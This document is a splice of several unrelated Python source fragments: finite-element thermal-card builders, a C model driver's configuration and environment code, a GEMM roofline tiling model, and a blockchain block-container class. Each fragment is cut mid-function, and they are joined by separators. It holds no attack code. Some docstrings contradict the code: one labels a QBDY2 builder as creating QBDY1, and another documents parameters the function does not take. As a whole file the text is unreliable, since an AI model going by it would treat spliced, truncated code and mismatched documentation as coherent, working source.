def add_qhbdy(self, sid, flag, q0, grids, af=None, comment='') -> QHBDY:
"""
Creates a QHBDY card
Parameters
----------
sid : int
load id
flag : str
valid_flags = {POINT, LINE, REV, AREA3, AREA4, AREA6, AREA8}
q0 : float
Magnitude of thermal flux into face. Q0 is positive for heat
into the surface
af : float; default=None
Area factor depends on type
grids : List[int]
Grid point identification of connected grid points
comment : str; default=''
a comment for the card
"""
load = QHBDY(sid, flag, q0, grids, af=af, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy1(self, sid, qflux, eids, comment='') -> QBDY1:
"""Creates a QBDY1 card"""
load = QBDY1(sid, qflux, eids, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy2(self, sid, eid, qfluxs, comment='') -> QBDY2:
"""Creates a QBDY1 card"""
load = QBDY2(sid, eid, qfluxs, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy3(self, sid, Q0, cntrlnd, eids, comment='') -> QBDY3:
"""
Creates a QBDY3 card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
q0 : float; default=None
Magnitude of thermal flux vector into face
control_id : int; default=0
Control point
eids : List[int] or THRU
Element identification number of a CHBDYE, CHBDYG, or
CHBDYP entry
comment : str; default=''
a comment for the card
"""
load = QBDY3(sid, Q0, cntrlnd, eids, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qvol(self, sid, qvol, control_point, elements, comment='') -> QVOL:
"""Creates a QVOL card"""
load = QVOL(sid, qvol, control_point, elements, comment=comment)
self._add_load_object(load)
return load
def add_qvect(self, sid, q0, eids, t_source=None,
ce=0, vector_tableds=None, control_id=0, comment='') -> QVECT:
"""
Creates a QVECT card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
q0 : float; default=None
Magnitude of thermal flux vector into face
t_source : float; default=None
Temperature of the radiant source
ce : int; default=0
Coordinate system identification number for thermal vector flux
vector_tableds : List[int/float, int/float, int/float]
vector : float; default=0.0
directional cosines in coordinate system CE) of
the thermal vector flux
tabled : int
TABLEDi entry identification numbers defining the
components as a function of time
control_id : int; default=0
Control point
eids : List[int] or THRU
Element identification number of a CHBDYE, CHBDYG, or
CHBDYP entry
comment : str; default=''
a comment for the card
"""
load = QVECT(sid, q0, eids, t_source=t_source, ce=ce,
vector_tableds=vector_tableds, control_id=control_id,
comment=comment)
self._add_dload_entry(load)
return load
def add_chbdyg(self, eid, surface_type, nodes,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0, comment='') -> CHBDYG:
"""Creates a CHBDYG card"""
elem = CHBDYG(eid, surface_type, nodes,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_chbdyp(self, eid, pid, surface_type, g1, g2,
g0=0, gmid=None, ce=0,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0,
e1=None, e2=None, e3=None,
comment='') -> CHBDYP:
"""
Creates a CHBDYP card
Parameters
----------
eid : int
Surface element ID
pid : int
PHBDY property entry identification numbers. (Integer > 0)
surface_type : str
Surface type
Must be {POINT, LINE, ELCYL, FTUBE, TUBE}
iview_front : int; default=0
A VIEW entry identification number for the front face.
iview_back : int; default=0
A VIEW entry identification number for the back face.
g1 / g2 : int
Grid point identification numbers of grids bounding the surface
g0 : int; default=0
Orientation grid point
rad_mid_front : int
RADM identification number for front face of surface element
rad_mid_back : int
RADM identification number for back face of surface element.
gmid : int
Grid point identification number of a midside node if it is used
with the line type surface element.
ce : int; default=0
Coordinate system for defining orientation vector
e1 / e2 / e3 : float; default=None
Components of the orientation vector in coordinate system CE.
The origin of the orientation vector is grid point G1.
comment : str; default=''
a comment for the card
"""
elem = CHBDYP(eid, pid, surface_type, g1, g2,
g0=g0, gmid=gmid, ce=ce,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
e1=e1, e2=e2, e3=e3,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_chbdye(self, eid, eid2, side,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0,
comment='') -> CHBDYE:
"""
Creates a CHBDYE card
Parameters
----------
eid : int
surface element ID number for a side of an element
eid2: int
a heat conduction element identification
side: int
a consistent element side identification number (1-6)
iview_front: int; default=0
a VIEW entry identification number for the front face
iview_back: int; default=0
a VIEW entry identification number for the back face
rad_mid_front: int; default=0
RADM identification number for front face of surface element
rad_mid_back: int; default=0
RADM identification number for back face of surface element
comment : str; default=''
a comment for the card
"""
elem = CHBDYE(eid, eid2, side,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_phbdy(self, pid, af=None, d1=None, d2=None, comment='') -> PHBDY:
"""
Creates a PHBDY card
Parameters
----------
eid : int
element id
pid : int
property id
af : int
Area factor of the surface used only for CHBDYP element
Must be {POINT, LINE, TUBE, ELCYL}
TUBE : constant thickness of hollow tube
d1, d2 : float; default=None
Diameters associated with the surface
Used with CHBDYP [ELCYL, TUBE, FTUBE] surface elements
comment : str; default=''
a comment for the card
"""
prop = PHBDY(pid, af=af, d1=d1, d2=d2, comment=comment)
self._add_phbdy_object(prop)
return prop
def add_conv(self, eid, pconid, ta, film_node=0, cntrlnd=0, comment='') -> CONV:
"""
Creates a CONV card
Parameters
----------
eid : int
element id
pconid : int
Convection property ID
mid : int
Material ID
ta : List[int]
Ambient points used for convection 0's are allowed for TA2
and higher
film_node : int; default=0
Point for film convection fluid property temperature
cntrlnd : int; default=0
Control point for free convection boundary condition
comment : str; default=''
a comment for the card
"""
boundary_condition = CONV(eid, pconid, ta,
film_node=film_node, cntrlnd=cntrlnd,
comment=comment)
self._add_thermal_bc_object(boundary_condition, boundary_condition.eid)
return boundary_condition
def add_convm(self, eid, pconvm, ta1, film_node=0, cntmdot=0,
ta2=None, | |
directory for
the MacOS SDK that should be used. Defaults to None and is
ignored.
vcpkg_dir (str, optional): Full path to the root directory containing
a vcpkg installation. This should be the directory that contains
the vcpkg executable and any packages installed by vcpkg (in
subdirectories). Defaults to None and is ignored.
**kwargs: Additional keyword arguments are passed to the parent
class's method.
Returns:
list: Section, option, description tuples for options that could not
be set.
"""
# Set vcpkg_dir & macos_sdkroot before calling parent so that it can be
# used in get_search_path when searching for dependencies
if (cls.language is not None) and (not cfg.has_section(cls.language)):
cfg.add_section(cls.language)
if vcpkg_dir is None:
vcpkg_dir = os.environ.get('VCPKG_ROOT', None)
if vcpkg_dir is not None:
vcpkg_dir = os.path.abspath(vcpkg_dir)
if not os.path.isdir(vcpkg_dir): # pragma: debug
raise ValueError("Path to vcpkg root directory "
"does not exist: %s." % vcpkg_dir)
cfg.set(cls._language, 'vcpkg_dir', vcpkg_dir)
if macos_sdkroot is None:
macos_sdkroot = _osx_sysroot
if macos_sdkroot is not None:
if not os.path.isdir(macos_sdkroot): # pragma: debug
raise ValueError("Path to MacOS SDK root directory "
"does not exist: %s." % macos_sdkroot)
cfg.set(cls._language, 'macos_sdkroot', macos_sdkroot)
# Call __func__ to avoid direct invoking of class which dosn't exist
# in after_registration where this is called
out = CompiledModelDriver.configure.__func__(cls, cfg, **kwargs)
# Change configuration to be directory containing include files
rjlib = cfg.get(cls._language, 'rapidjson_include', None)
if (rjlib is not None) and os.path.isfile(rjlib):
cfg.set(cls._language, 'rapidjson_include',
os.path.dirname(os.path.dirname(rjlib)))
nplib = cfg.get(cls._language, 'numpy_include', None)
if (nplib is not None) and os.path.isfile(nplib):
cfg.set(cls._language, 'numpy_include',
os.path.dirname(os.path.dirname(nplib)))
return out
@classmethod
def get_dependency_info(cls, dep, toolname=None, default=None):
r"""Get the dictionary of information associated with a
dependency.
Args:
dep (str): Name of internal or external dependency or full path
to the library.
toolname (str, optional): Name of compiler tool that should be used.
Defaults to None and the default compiler for the language will
be used.
default (dict, optional): Information dictionary that should
be returned if dep cannot be located. Defaults to None
and an error will be raised if dep cannot be found.
Returns:
dict: Dependency info.
"""
replaced_toolname = False
if platform._is_win and (dep == 'python_wrapper'):
# The Python library is compiled against MSVC so a wrapper is requried
# to reconcile the differences in FILE* between gcc and MSVC.
if get_compilation_tool('compiler', 'cl').is_installed():
replaced_toolname = True
toolname = 'cl'
out = super(CModelDriver, cls).get_dependency_info(
dep, toolname=toolname, default=default)
if replaced_toolname:
out['remove_flags'] = ['/TP']
out['toolname'] = toolname
return out
@classmethod
def call_linker(cls, obj, language=None, **kwargs):
r"""Link several object files to create an executable or library (shared
or static), checking for errors.
Args:
obj (list): Object files that should be linked.
language (str, optional): Language that should be used to link
the files. Defaults to None and the language of the current
driver is used.
**kwargs: Additional keyword arguments are passed to run_executable.
Returns:
str: Full path to compiled source.
"""
if (((cls.language == 'c') and (language is None)
and kwargs.get('for_model', False)
and (not kwargs.get('skip_interface_flags', False)))):
language = 'c++'
kwargs.update(cls.update_linker_kwargs(**kwargs))
kwargs['skip_interface_flags'] = True
return super(CModelDriver, cls).call_linker(obj, language=language,
**kwargs)
@classmethod
def update_ld_library_path(cls, env, paths_to_add=None,
add_to_front=False, add_libpython_dir=False,
toolname=None, env_var=None, **kwargs):
r"""Update provided dictionary of environment variables so that
LD_LIBRARY_PATH includes the interface directory containing the interface
libraries.
Args:
env (dict): Dictionary of enviroment variables to be updated.
paths_to_add (list, optional): Paths that should be added. If not
provided, defaults to [cls.get_language_dir()].
add_to_front (bool, optional): If True, new paths are added to the
front, rather than the end. Defaults to False.
add_libpython_dir (bool, optional): If True, the directory
containing the Python C library will be added. Defaults
to False.
toolname (str, optional): Name of compiler tool that should be used.
Defaults to None and the default compiler for the language will
be used.
env_var (str, optional): Environment variable where the paths
should be added. Defaults to None and is only set for
linux (LD_LIBRARY_PATH) and windows (PATH).
**kwargs: Additional keyword arguments are ignored.
Returns:
dict: Updated dictionary of environment variables.
"""
if paths_to_add is None:
paths_to_add = []
paths_to_add = paths_to_add + [cls.get_language_dir()]
if add_libpython_dir:
paths_to_add = paths_to_add + [os.path.dirname(
cls.get_dependency_library('python', toolname=toolname))]
if platform._is_win and ygg_cfg.get('c', 'vcpkg_dir', None):
if platform._is_64bit:
arch = 'x64-windows'
else: # pragma: debug
arch = 'x86-windows'
raise NotImplementedError("Not yet tested on 32bit Python")
paths_to_add.append(os.path.join(ygg_cfg.get('c', 'vcpkg_dir'),
'installed', arch, 'bin'))
if env_var is None:
if platform._is_linux:
env_var = 'LD_LIBRARY_PATH'
elif platform._is_win:
env_var = 'PATH'
if env_var is not None:
path_list = []
prev_path = env.pop(env_var, '')
prev_path_list = prev_path.split(os.pathsep)
if prev_path:
path_list.append(prev_path)
for x in paths_to_add:
if x not in prev_path_list:
if add_to_front:
path_list.insert(0, x)
else:
path_list.append(x)
if path_list:
env[env_var] = os.pathsep.join(path_list)
return env
@classmethod
def update_python_path(cls, env):
r"""Update provided dictionary of environment variables so that
PYTHONPATH and PYTHONHOME are set as needed (primarily on windows).
Args:
env (dict): Dictionary of enviroment variables to be updated.
Returns:
dict: Updated dictionary of environment variables.
"""
if platform._is_win: # pragma: windows
env.setdefault('PYTHONHOME', sysconfig.get_config_var('prefix'))
env.setdefault('PYTHONPATH', os.pathsep.join([
sysconfig.get_path('stdlib'), sysconfig.get_path('purelib'),
os.path.join(sysconfig.get_config_var('prefix'), 'DLLs')]))
return env
@classmethod
def set_env_class(cls, **kwargs):
r"""Set environment variables that are instance independent.
Args:
**kwargs: Additional keyword arguments are passed to the parent
class's method and update_ld_library_path.
Returns:
dict: Environment variables for the model process.
"""
out = super(CModelDriver, cls).set_env_class(**kwargs)
out = cls.update_ld_library_path(out, **kwargs)
out = cls.update_python_path(out)
return out
@classmethod
def parse_var_definition(cls, io, value, **kwargs):
r"""Extract information about input/output variables from a
string definition.
Args:
io (str): Description of variables contained in the provided
string. Must be 'inputs' or 'outputs'.
value (str): String containing one or more variable definitions.
**kwargs: Additional keyword arguments are passed to the
parent class's method.
Returns:
list: List of information about the variables contained in
the provided string.
Raises:
AssertionError: If io is not 'inputs' or 'outputs'.
NotImplementedError: If the def_regex for the specified
io is not defined.
"""
out = super(CModelDriver, cls).parse_var_definition(io, value, **kwargs)
io_map = {x['name']: x for x in out}
for i, x in enumerate(out):
if (x['name'] + '_length') in io_map:
x['length_var'] = x['name'] + '_length'
elif ('length_' + x['name']) in io_map:
x['length_var'] = 'length_' + x['name']
elif (((x['name'] + '_ndim') in io_map)
and ((x['name'] + '_shape') in io_map)):
x['ndim_var'] = x['name'] + '_ndim'
x['shape_var'] = x['name'] + '_shape'
x['datatype']['type'] = 'ndarray'
elif ((('ndim_' + x['name']) in io_map)
and (('shape_' + x['name']) in io_map)):
x['ndim_var'] = 'ndim_' + x['name']
x['shape_var'] = 'shape_' + x['name']
x['datatype']['type'] = 'ndarray'
elif 'shape' in x:
x['datatype']['shape'] = [
int(float(s.strip('[]')))
for s in x.pop('shape').split('][')]
assert(x['datatype']['subtype'] in _valid_types)
if len(x['datatype']['shape']) == 1:
x['datatype']['length'] = x['datatype'].pop(
'shape')[0]
x['datatype']['type'] = '1darray'
else:
x['datatype']['type'] = 'ndarray'
return out
@classmethod
def update_io_from_function(cls, model_file, model_function,
inputs=[], outputs=[], **kwargs):
r"""Update inputs/outputs from the function definition.
Args:
model_file (str): Full path to the file containing the model
function's declaration.
model_function (str): Name of the model function.
inputs (list, optional): List of model inputs including types.
Defaults to [].
outputs (list, optional): List of model outputs including types.
Defaults to [].
**kwargs: Additional keyword arguments are passed to the parent
class's method.
Returns:
dict, None: Flag variable used by the model. If None, the
model does not use a flag variable.
"""
flag_var = super(CModelDriver, cls).update_io_from_function(
model_file, model_function, inputs=inputs,
outputs=outputs, **kwargs)
# Add length_vars if missing for use by yggdrasil
for x in inputs:
for v in x['vars']:
if cls.requires_length_var(v) and (not v.get('length_var', False)):
v['length_var'] = {'name': v['name'] + '_length',
'datatype': {'type': 'uint',
'precision': 64},
'is_length_var': True,
'dependent': True}
elif cls.requires_shape_var(v):
if not (v.get('ndim_var', False)
and v.get('shape_var', False)): # pragma: debug
raise RuntimeError("Uncomment logic that follows.")
# if not v.get('ndim_var', False):
# v['ndim_var'] = {
# 'name': v['name'] + '_ndim',
# 'datatype': {'type': 'uint',
# 'precision': 64},
# 'is_length_var': True,
# 'dependent': True}
# if not v.get('shape_var', False):
# v['shape_var'] = {
# 'name': v['name'] + '_ndim',
# 'datatype': {'type': '1darray',
# 'subtype': 'uint',
# 'precision': 64},
# 'is_length_var': True,
# 'dependent': True}
for x in outputs:
for v in x['vars']:
if cls.requires_length_var(v) and (not v.get('length_var', False)):
| |
self.th)
max_time = max(time)
if self.debug:
print('{}: {}'.format(name, max_time))
print('GEMM flops: {:,}'.format(flop))
for i in range(0, num_level):
print("L{}".format(i))
print("inflection_point: {:.2f}".format(inflection_point[i]))
print("comp_int: {:.2f}".format(comp_int[i]))
print("time: {}".format(time[i]))
print()
#print("Roofline: exited {}".format(name))
return max_time
#Convert GEMM into sqaure tiles
# def getGEMMTime(self, A_, B_, C_, name):
#
# #A = util.power2RoundUp(A_)
# #B = util.power2RoundUp(B_)
# #C = util.power2RoundUp(C_)
# A = A_
# B = B_
# C = C_
# #return False, self.GEMM_wrapper(A, B, C, name)
# dim = min(min(A, B), C)
# Af = math.ceil(A / dim)
# Bf = math.ceil(B / dim)
# Cf = math.ceil(C / dim)
# time = (Af * Bf * Cf) * self.GEMM_Strassen(dim, name) + (Af * Cf * (Bf-1)) * self.getAddTime(dim, dim, name)
# return False, time
# def GEMM_Strassen(self, dim, name):
# if dim <= 512:
# time = self.GEMM_wrapper(dim, dim, dim, name)
# return time
# else:
# time = 7 * self.GEMM_Strassen(dim // 2, name) #+ 18 * self.getAddTime(dim // 2, dim // 2, name)
# return time
#
# def getAddTime(self, A, B, name):
# ADD_flop = A * B
# ADD_gmem = 3 * A * B * self.precision
# ADD_time = self.roofline(ADD_flop, ADD_gmem, name='FMA addition') + self.O
# return ADD_time
def getGEMMTime(self, dim1, dim2, dim3, name):
tile2time = {}
orderSpace = self.generateOrder(dim1, dim2, dim3, name)
for order_dims in orderSpace:
if self.debug:
print("===============================================================")
print("order: {}".format(order_dims))
print("===============================================================")
for tile_dims in self.tileSpace:
if self.debug:
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("tile: {}".format(tile_dims))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
GEMM_flop, mem_access = self.GEMM(order_dims, tile_dims, name)
GEMM_time = self.roofline(GEMM_flop,mem_access, name) + self.O
tile2time[(order_dims, tile_dims)] = GEMM_time
best_tile = min(tile2time, key=tile2time.get)
best_time = tile2time[best_tile]
if self.debug:
print("{}: Best Time: {:,}, Best Order: {}, Best Tile: {}\n".format(name, best_time, best_tile[0], best_tile[1]))
return best_time, best_tile[0], best_tile[1]
def generateOrder(self, dim1, dim2, dim3, name):
if self.dataflow =="best": # best stationary
if dim1 >= max(dim2, dim3):
self.dataflow = "wst"
elif dim2 >= max(dim1, dim3):
self.dataflow = "ost"
elif dim3 >= max(dim1, dim2):
self.dataflow = "ast"
order=[]
if self.dataflow == "wst": #weight stationary
order.append((dim2, dim3, dim1))
if dim2 != dim3:
order.append((dim3, dim2, dim1))
elif self.dataflow == "ast": #activation stationary
order.append((dim1, dim2, dim3))
if dim2 != dim1:
order.append((dim2, dim1, dim3))
elif self.dataflow == "ost": #output stationary
order.append((dim1, dim3, dim2))
if dim1 != dim3:
order.append((dim3, dim1, dim2))
elif self.dataflow == "none": # not stationary
if dim1 != dim2 and dim2 != dim3 and dim1 != dim3:
order=list(itertools.permutations([dim1, dim2, dim3]))
elif dim1 == dim2 and dim2 != dim3:
order = [(dim1, dim2, dim3), (dim1, dim3, dim2), (dim3, dim1, dim2)]
elif dim1 == dim3 and dim2 != dim1:
order = [(dim1, dim2, dim3), (dim1, dim3, dim2), (dim2, dim1, dim3)]
elif dim2 == dim3 and dim1 != dim2:
order = [(dim1, dim2, dim3), (dim2, dim1, dim3), (dim2, dim3, dim1)]
return order
def generateTileSpace(self):
tile_space = []
tiles = [None] * self.num_levels
for level in range(0, self.num_levels-1):
memory = self.memLayer[level]
#tiles[level] = self.getTileDims(memory)
tiles[level] = memory.getTileDims()
if self.num_levels == 1:
tile_space = []
elif self.num_levels == 2:
tile_space = tiles[0]
elif self.num_levels == 3:
tile_space = [(x,y) for x in tiles[0] for y in tiles[1]]
elif self.num_levels == 4:
tile_space = [(x,y,z) for x in tiles[0] for y in tiles[1] for z in tiles[2]]
else:
raise NotImplementedError()
return tile_space
def getTileSize(self, lid):
memory = self.memLayer[lid]
memory.calcTileDim()
tile_dim = memory.getTileDim()
return tile_dim, tile_dim, tile_dim
#Count the number of accesses from level-1 to level
# input matrix A(dim1, dim2) and B(dim2, dim3)
# output matrix C(dim1, dim3)
def getNumAccesses(self, level, dim1, dim2, dim3, tile_dim, num_repeat, name):
#tile1,tile2,tile3 = self.getTileSize(level-1)
tile1, tile2, tile3 = tile_dim
orig_size = tile1*tile2 + tile1*tile3 + tile2*tile3
short_tile_cond = [0,0,0]
if tile1 > dim1:
tile1 = dim1
short_tile_cond[0] = 1
if tile2 > dim2:
tile2 = dim2
short_tile_cond[1] = 1
if tile3 > dim3:
tile3 = dim3
short_tile_cond[2] = 1
if short_tile_cond[2] == 0 and (short_tile_cond[0] | short_tile_cond[1]) == 1:
if level <= 1:
tile3 = math.floor((orig_size - tile1 * tile2) / (tile1 + tile2))
else:
#store bypasses cache, directly goes to memory
tile3 = math.floor((orig_size - tile1 * tile2) / tile2)
if tile3 > dim3:
tile3 = dim3
#Uncomment if tile3 needs to be pow of 2
#tile3 = int(math.pow(2, math.floor(math.log2(tile3))))
elif short_tile_cond[0] == 0 and (short_tile_cond[1] | short_tile_cond[2]) == 1:
if level <= 1:
tile1 = math.floor((orig_size - tile3 * tile2) / (tile3 + tile2))
else:
#store bypasses cache, directly goes to memory
tile1 = math.floor((orig_size - tile3 * tile2) / tile2)
if tile1 > dim1:
tile1 = dim1
elif short_tile_cond[1] == 0 and (short_tile_cond[0] & short_tile_cond[2]) == 1:
if level <= 1:
tile2 = math.floor((orig_size - tile3 * tile1) / (tile3 + tile1))
else:
tile2 = math.floor((orig_size) / (tile1 + tile3))
if tile2 > dim2:
tile2 = dim2
reload_A = 1
reload_B = 1
reload_C = 1
if tile1 > 0 and tile2 > 0 and tile3 > 0:
reload_A = math.ceil(dim3 / tile3)
reload_B = math.ceil(dim1 / tile1)
#do not access the slow memory on every write,acculmuate in fast memory
reload_C = (1 if level > 1 else math.ceil(dim2 / tile2))
num_mem = num_repeat * (dim1 * dim2 * reload_A + dim2 * dim3 * reload_B + dim1 * dim3 * reload_C) * self.precision
if self.debug:
print(name)
print("Matrix dimension at Level {}: {:,} x {:,} x {:,}".format(level, dim1, dim2, dim3))
print("Tile dimension at Level {}: {:,} x {:,} x {:,}".format(level-1, tile1, tile2, tile3))
print("reload_A: {}, reload_B: {}, reload_C: {}".format(reload_A, reload_B, reload_C))
print("num_repeat: {}".format(num_repeat))
print("Bytes Accessed: {:,}".format(num_mem))
print("")
return num_mem, tile1, tile2, tile3
#This is the main function that captures the memory hierarchy impact
#on the number of accesses to global memory considering not everything fits in
#L2 cache and also captures the effect of shared memory
def GEMM(self, order_dims, tile_dims, name):
dim1_ = order_dims[0]
dim2_ = order_dims[1]
dim3_ = order_dims[2]
#dim1 = util.power2RoundUp(dim1_)
#dim2 = util.power2RoundUp(dim2_)
#dim3 = util.power2RoundUp(dim3_)
dim1 = dim1_
dim2 = dim2_
dim3 = dim3_
GEMM_flop = dim1 * dim3 * (dim2 + dim2 - 1)
#dim2 multiply
#dim2-1 add
#X1 = self.L2_tile_dim
#X2 = self.shared_mem_tile_dim
#X3 = self.reg_tile_dim
num_accesses = [0] * self.num_levels
if (algByte):
num_accesses[self.num_levels - 1] = (dim1 * dim2 + dim2 * dim3 + dim1 * dim3) * self.precision
else:
num_repeat = 1
for level in range(self.num_levels - 1, 0, -1):
num_accesses[level], tile1, tile2, tile3 = self.getNumAccesses(level, dim1, dim2, dim3, tile_dims[level-1], num_repeat, name)
try:
num_repeat *= math.ceil(dim1/tile1) * math.ceil(dim2/tile2) * math.ceil(dim3/tile3)
except:
num_repeat *= 1
dim1 = tile1 if tile1 != 0 else dim1
dim2 = tile2 if tile2 != 0 else dim2
dim3 = tile3 if tile3 != 0 else dim3
#Number of accesses to level0 (for every 2N^3 computation, 3N^2 memory accesses happen, where N is the width of the systolic engine)
reuse = 1
dim1 = dim1_
dim2 = dim2_
dim3 = dim3_
if self.dataflow == "none":
reuse = 1
elif self.dataflow == "best":
reuse = max(math.ceil(dim1/self.FMA_width), math.ceil(dim3/self.FMA_width), math.ceil(dim2/self.FMA_width))
elif self.dataflow == "wst": #wt stationary
reuse = math.ceil(dim1/self.FMA_width)
elif self.dataflow == "ast": #act statinary
reuse = math.ceil(dim3/self.FMA_width)
elif self.dataflow == "ost": #output stationary
reuse = math.ceil(dim2/self.FMA_width)
else:
raise NotImplementedError()
#TODO: make sure to model underutilized systolic array
#TODO: support FMA_width_x and FMA_width_y
num_accesses[0] = GEMM_flop * ((2 * reuse + 1) / (2 * reuse)) * 1/self.FMA_width * self.precision
#num_accesses[0] = GEMM_flop * ((2 * reuse + self.FMA_width) / (2 * reuse)) * 1/self.FMA_width * self.precision
#TODO: do we still need these in new hierarchical version?
# if X3 == 0:
# GEMM_smem = GEMM_rmem
# GEMM_rmem = 0
# if X2 == 0:
# GEMM_l2mem = GEMM_smem
# GEMM_smem = 0
# if X1 == 0:
# GEMM_gmem = GEMM_l2mem
# GEMM_l2mem = 0
# try:
# GEMM_l2mem = GEMM_smem
# GEMM_smem = 0
# | |
<filename>src/ape/managers/chain.py
import time
from pathlib import Path
from typing import Callable, Dict, Iterator, List, Optional, Tuple, Union
from ethpm_types import ContractType
from ape.api import Address, BlockAPI, ReceiptAPI
from ape.api.address import BaseAddress
from ape.api.networks import LOCAL_NETWORK_NAME, NetworkAPI, ProxyInfoAPI
from ape.api.query import BlockQuery
from ape.exceptions import ChainError, UnknownSnapshotError
from ape.logging import logger
from ape.managers.base import BaseManager
from ape.types import AddressType, BlockID, SnapshotID
from ape.utils import cached_property
class BlockContainer(BaseManager):
"""
A list of blocks on the chain.
Usages example::
from ape import chain
latest_block = chain.blocks[-1]
"""
@property
def head(self) -> BlockAPI:
"""
The latest block.
"""
return self._get_block("latest")
@property
def height(self) -> int:
"""
The latest block number.
"""
if self.head.number is None:
raise ChainError("Latest block has no number.")
return self.head.number
@property
def network_confirmations(self) -> int:
return self.provider.network.required_confirmations
def __getitem__(self, block_number: int) -> BlockAPI:
"""
Get a block by number. Negative numbers start at the chain head and
move backwards. For example, ``-1`` would be the latest block and
``-2`` would be the block prior to that one, and so on.
Args:
block_number (int): The number of the block to get.
Returns:
:class:`~ape.api.providers.BlockAPI`
"""
if block_number < 0:
block_number = len(self) + block_number
return self._get_block(block_number)
def __len__(self) -> int:
"""
The number of blocks in the chain.
Returns:
int
"""
return self.height + 1
def __iter__(self) -> Iterator[BlockAPI]:
"""
Iterate over all the current blocks.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
return self.range(len(self))
def query(
self,
*columns: List[str],
start_block: int = 0,
stop_block: Optional[int] = None,
step: int = 1,
engine_to_use: Optional[str] = None,
) -> Iterator:
"""
A method for querying blocks and returning an Iterator. If you
do not provide a starting block, the 0 block is assumed. If you do not
provide a stopping block, the last block is assumed. You can pass
``engine_to_use`` to short-circuit engine selection.
Raises:
:class:`~ape.exceptions.ChainError`: When ``stop_block`` is greater
than the chain length.
Args:
columns (List[str]): columns in the DataFrame to return
start_block (int): The first block, by number, to include in the
query. Defaults to 0.
stop_block (Optional[int]): The last block, by number, to include
in the query. Defaults to the latest block.
step (int): The number of blocks to iterate between block numbers.
Defaults to ``1``.
engine_to_use (Optional[str]): query engine to use, bypasses query
engine selection algorithm.
Returns:
Iterator
"""
if stop_block is None:
stop_block = self.height
elif stop_block > self.height:
raise ChainError(
f"'stop_block={stop_block}' cannot be greater than the chain length ({len(self)}). "
f"Use '{self.poll_blocks.__name__}()' to wait for future blocks."
)
query = BlockQuery(
columns=columns,
start_block=start_block,
stop_block=stop_block,
step=step,
engine_to_use=engine_to_use,
)
return self.query_manager.query(query)
def range(
self, start_or_stop: int, stop: Optional[int] = None, step: int = 1
) -> Iterator[BlockAPI]:
"""
Iterate over blocks. Works similarly to python ``range()``.
Raises:
:class:`~ape.exceptions.ChainError`: When ``stop`` is greater
than the chain length.
:class:`~ape.exceptions.ChainError`: When ``stop`` is less
than ``start_block``.
:class:`~ape.exceptions.ChainError`: When ``stop`` is less
than 0.
:class:`~ape.exceptions.ChainError`: When ``start`` is less
than 0.
Args:
start_or_stop (int): When given just a single value, it is the stop.
Otherwise, it is the start. This mimics the behavior of ``range``
built-in Python function.
stop (Optional[int]): The block number to stop before. Also the total
number of blocks to get. If not setting a start value, is set by
the first argument.
step (Optional[int]): The value to increment by. Defaults to ``1``.
number of blocks to get. Defaults to the latest block.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
if stop is None:
stop = start_or_stop
start = 0
else:
start = start_or_stop
if stop > len(self):
raise ChainError(
f"'stop={stop}' cannot be greater than the chain length ({len(self)}). "
f"Use '{self.poll_blocks.__name__}()' to wait for future blocks."
)
elif stop < start:
raise ValueError(f"stop '{stop}' cannot be less than start '{start}'.")
elif stop < 0:
raise ValueError(f"start '{start}' cannot be negative.")
elif start_or_stop < 0:
raise ValueError(f"stop '{stop}' cannot be negative.")
# Note: the range `stop_block` is a non-inclusive stop, while the
# `.query` method uses an inclusive stop, so we must adjust downwards.
results = self.query("*", start_block=start, stop_block=stop - 1, step=step) # type: ignore
for _ in results:
yield _
def poll_blocks(
self,
start: Optional[int] = None,
stop: Optional[int] = None,
required_confirmations: Optional[int] = None,
) -> Iterator[BlockAPI]:
"""
Poll new blocks. Optionally set a start block to include historical blocks.
**NOTE**: This is a daemon method; it does not terminate unless an exception occurrs
or a ``stop`` is given.
Usage example::
from ape import chain
for new_block in chain.blocks.poll_blocks():
print(f"New block found: number={new_block.number}")
Args:
start (Optional[int]): The block number to start with. Defaults to the pending
block number.
stop (Optional[int]): Optionally set a future block number to stop at.
Defaults to never-ending.
required_confirmations (Optional[int]): The amount of confirmations to wait
before yielding the block. The more confirmations, the less likely a reorg will occur.
Defaults to the network's configured required confirmations.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
if required_confirmations is None:
required_confirmations = self.network_confirmations
if stop is not None and stop <= self.chain_manager.blocks.height:
raise ValueError("'stop' argument must be in the future.")
# Get number of last block with the necessary amount of confirmations.
latest_confirmed_block_number = self.height - required_confirmations
has_yielded = False
if start is not None:
# Front-load historically confirmed blocks.
yield from self.range(start, latest_confirmed_block_number + 1)
has_yielded = True
time.sleep(self.provider.network.block_time)
while True:
confirmable_block_number = self.height - required_confirmations
if confirmable_block_number < latest_confirmed_block_number and has_yielded:
logger.error(
"Chain has reorganized since returning the last block. "
"Try adjusting the required network confirmations."
)
elif confirmable_block_number > latest_confirmed_block_number:
# Yield all missed confirmable blocks
new_blocks_count = confirmable_block_number - latest_confirmed_block_number
for i in range(new_blocks_count):
block_num = latest_confirmed_block_number + i
block = self._get_block(block_num)
yield block
if stop and block.number == stop:
return
has_yielded = True
latest_confirmed_block_number = confirmable_block_number
time.sleep(self.provider.network.block_time)
def _get_block(self, block_id: BlockID) -> BlockAPI:
return self.provider.get_block(block_id)
class AccountHistory(BaseManager):
"""
A container mapping account addresses to the transaction from the active session.
"""
